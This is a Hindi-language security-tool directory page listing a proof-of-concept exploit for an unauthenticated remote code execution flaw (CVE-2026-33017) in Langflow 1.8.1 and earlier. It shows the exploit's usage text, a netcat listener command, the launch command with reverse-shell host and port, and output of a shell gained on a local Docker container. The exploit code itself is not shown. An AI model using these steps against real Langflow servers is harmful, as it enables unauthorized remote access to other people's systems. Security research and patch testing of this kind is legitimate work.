Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-CVE-2026-33017 — # CVE-2026-33017 (Langflow <= 1.8.1) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/masterwok/poc-cve-2026-33017
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubmasterwok/poc-cve-2026-33017

PoC-CVE-2026-33017

# CVE-2026-33017 (Langflow <= 1.8.1) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट

रिपॉजिटरी देखें
25 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PoC: CVE-2026-33017

Langflow <= 1.8.1 एक दूरस्थ, बिना प्रमाणीकरण वाले RCE के प्रति संवेदनशील है (https://nvd.nist.gov/vuln/detail/CVE-2026-33017)


उपयोग

root@kitploit:~
usage: CVE-2026-33017.py [-h] --lhost LHOST --lport LPORT target

PoC exploit: CVE-2026-33017

positional arguments:
  target         Target hostname

options:
  -h, --help     show this help message and exit
  --lhost LHOST  Reverse shell destination IP address
  --lport LPORT  Reverse shell destination port

उदाहरण

root@kitploit:~
# Create docker instance
docker run -d -p 7860:7860 langflowai/langflow:1.8.1

# Start listener
nc -lnvp 4444

# Launch exploit
python3 CVE-2026-33017.py 127.0.0.1 --lhost 192.168.1.17 --lport 4444

# Should receive reverse shell in listener
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 42712
uname -a
Linux 9be89ace430c 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux

यह प्रोजेक्ट केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है। इस कोड के दुरुपयोग या इससे होने वाली क्षति के लिए लेखक जिम्मेदार नहीं है।

टूल डाउनलोड करें